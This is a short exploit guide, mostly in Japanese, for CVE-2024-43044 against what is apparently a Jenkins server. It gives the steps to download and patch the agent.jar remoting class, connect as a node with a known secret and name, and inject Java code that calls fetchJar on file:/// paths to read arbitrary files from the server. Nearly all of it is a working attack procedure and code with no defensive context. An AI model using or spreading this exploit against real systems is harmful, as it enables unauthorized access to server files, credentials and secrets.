
CVE-2024-43044の悪用方法
http://ip:port/jnlpJars/agent.jar から jar パッケージをダウンロードする
\hudson\remoting\RemoteClassLoader.class に対応するコードを修正する

再コンパイルしてパッケージ化する
事前にノードのシークレットと名前を把握しておく必要がある

java -jar agent.jar -url http://ip:port/ -secret <xxx> -name <xxx>
追加する内容は以下の通り:
import java.util.Scanner;
try {
Scanner scanner = new Scanner(System.in);
System.out.print("输入读取文件path:");
String inputText = scanner.nextLine();
System.out.println("尝试读取:" + inputText);
URL jarFileUrl = new URL("file:///" + inputText);
byte[] fileContent = this.proxy.fetchJar(jarFileUrl);
String contentAsString = new String(fileContent, StandardCharsets.UTF_8);
System.out.println("文件内容:\n" + contentAsString);
} catch (Exception var10) {
System.out.println("WRONG:" + var10);
}
